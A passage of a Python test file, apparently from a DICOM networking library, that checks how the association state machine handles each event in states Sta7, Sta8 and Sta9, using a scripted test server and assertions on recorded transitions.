assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt6"]
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt07(self):
"""Test Sta7 + Evt7."""
# Sta7 + Evt7 -> <ignore> -> Sta7
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("accept"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt7"]
def test_evt08(self):
"""Test Sta7 + Evt8."""
# Sta7 + Evt8 -> <ignore> -> Sta7
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("reject"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt8"]
def test_evt09(self):
"""Test Sta7 + Evt9."""
# Sta7 + Evt9 -> <ignore> -> Sta7
# Evt9: Receive P-DATA primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt9"]
def test_evt10(self):
"""Test Sta7 + Evt10."""
# Sta7 + Evt10 -> AR-6 -> Sta7
# Evt10: Receive P-DATA-TF PDU from <remote>
# AR-6: Send P-DATA primitive
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", p_data_tf),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
# primitive = self.assoc.dul.receive_pdu(wait=False)
# assert isinstance(primitive, P_DATA)
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt10", "AR-6"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt10"]
def test_evt11(self):
"""Test Sta7 + Evt11."""
# Sta7 + Evt11 -> <ignore> -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt11"]
def test_evt12(self):
"""Test Sta7 + Evt12."""
# Sta7 + Evt12 -> AR-8 -> Sta9 or Sta10
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-8: Issue A-RELEASE (rq) - release collision
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt12"]
def test_evt13(self):
"""Test Sta7 + Evt13."""
# Sta7 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rp),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
primitive = self.assoc.dul.receive_pdu(wait=False)
assert isinstance(primitive, A_RELEASE)
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt13", "AR-3"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt13"]
def test_evt14(self):
"""Test Sta7 + Evt14."""
# Sta7 + Evt14 -> <ignore> -> Sta7
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt14"]
def test_evt15(self):
"""Test Sta7 + Evt15."""
# Sta7 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt15", "AA-1"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt15"]
def test_evt16(self):
"""Test Sta7 + Evt16."""
# Sta7 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_abort),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt16", "AA-3"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt16"]
def test_evt17(self):
"""Test Sta7 + Evt17."""
# Sta7 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt17", "AA-4"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt17"]
def test_evt18(self):
"""Test Sta7 + Evt18."""
# Sta7 + Evt18 -> <ignore> -> Sta7
# Evt18: ARTIM timer expired from <local service>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt18"]
def test_evt19(self):
"""Test Sta7 + Evt19."""
# Sta7 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", b"\x08\x00\x00\x00\x00\x00"),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt19", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt19"]
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState08(TestStateBase):
"""Tests for State 08: Awaiting A-RELEASE (rp) primitive."""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta6")
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta8")
def test_evt01(self):
"""Test Sta8 + Evt1."""
# Sta8 + Evt1 -> <ignore> -> Sta8
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("request"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt1"]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta8 + Evt2."""
# Sta8 + Evt2 -> <ignore> -> Sta8
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta8 + Evt3."""
# Sta8 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("send", a_associate_ac),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
("Sta8", "Evt3", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt3"]
def test_evt04(self):
"""Test Sta8 + Evt4."""
# Sta8 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("send", a_associate_rj),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
("Sta8", "Evt4", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt4"]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta8 + Evt5."""
# Sta8 + Evt5 -> <ignore> -> Sta8
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta8 + Evt6."""
# Sta8 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("send", a_associate_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
("Sta8", "Evt6", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt6"]
def test_evt07(self):
"""Test Sta8 + Evt7."""
# Sta8 + Evt7 -> <ignore> -> Sta8
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("accept"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt7"]
def test_evt08(self):
"""Test Sta8 + Evt8."""
# Sta8 + Evt8 -> <ignore> -> Sta8
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("reject"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt8"]
def test_evt09(self):
"""Test Sta8 + Evt9."""
# Sta8 + Evt9 -> AR-7 -> Sta8
# Evt9: Receive P-DATA primitive from <local user>
# AR-7: Send P-DATA-TF PDU to <remote>
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt9"]
def test_evt10(self):
"""Test Sta8 + Evt10."""
# Sta8 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("send", p_data_tf),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
("Sta8", "Evt10", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt10"]
def test_evt11(self):
"""Test Sta8 + Evt11."""
# Sta8 + Evt11 -> <ignore> -> Sta8
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt11"]
def test_evt12(self):
"""Test Sta8 + Evt12."""
# Sta8 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None), # get a_assoc_rq
("send", a_associate_ac),
("send", a_release_rq),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
("Sta8", "Evt12", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt12"]
def test_evt13(self):
"""Test Sta8 + Evt13."""
# Sta8 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("send", a_release_rp),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
("Sta8", "Evt13", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt13"]
def test_evt14(self):
"""Test Sta8 + Evt14."""
# Sta8 + Evt14 -> AR-4 -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Send A-RELEASE-RP PDU and start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt14"]
def test_evt15(self):
"""Test Sta8 + Evt15."""
# Sta8 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
("Sta8", "Evt15", "AA-1"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt15"]
def test_evt16(self):
"""Test Sta8 + Evt16."""
# Sta8 + Evt16 -> AA-3 -> Sta13
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("send", a_abort),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
("Sta8", "Evt16", "AA-3"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt16"]
def test_evt17(self):
"""Test Sta8 + Evt17."""
# Sta8 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
("Sta8", "Evt17", "AA-4"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt17"]
def test_evt18(self):
"""Test Sta8 + Evt18."""
# Sta8 + Evt18 -> <ignore> -> Sta1
# Evt18: ARTIM timer expired from <local service>
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt18"]
def test_evt19(self):
"""Test Sta8 + Evt19."""
# Sta8 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("send", a_release_rq),
("send", b"\x08\x00\x00\x00\x00\x00"),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt12", "AR-2"),
("Sta8", "Evt19", "AA-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt19"]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState09(TestStateBase):
"""Tests for State 09: Release collision req - awaiting A-RELEASE (rp)."""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta6")
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta9")
def test_evt01(self):
"""Test Sta9 + Evt1."""
# Sta9 + Evt1 -> <ignore> -> Sta9
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
("recv", None), # recv a-associate-rq
("send", a_associate_ac),
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("request"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt1",
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta9 + Evt2."""
# Sta9 + Evt2 -> <ignore> -> Sta9
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta9 + Evt3."""
# Sta9 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None), # recv a-associate-rq
("send", a_associate_ac),
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_associate_ac), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt3", "AA-8"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt3",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt04(self):
"""Test Sta9 + Evt4."""
# Sta9 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None), # recv a-associate-rq
("send", a_associate_ac),
("recv", None), # recv a-release-rq
("send", a_release_rq),
("send", a_associate_rj),
("recv", None), # recv a-abort
("exit", None),
]
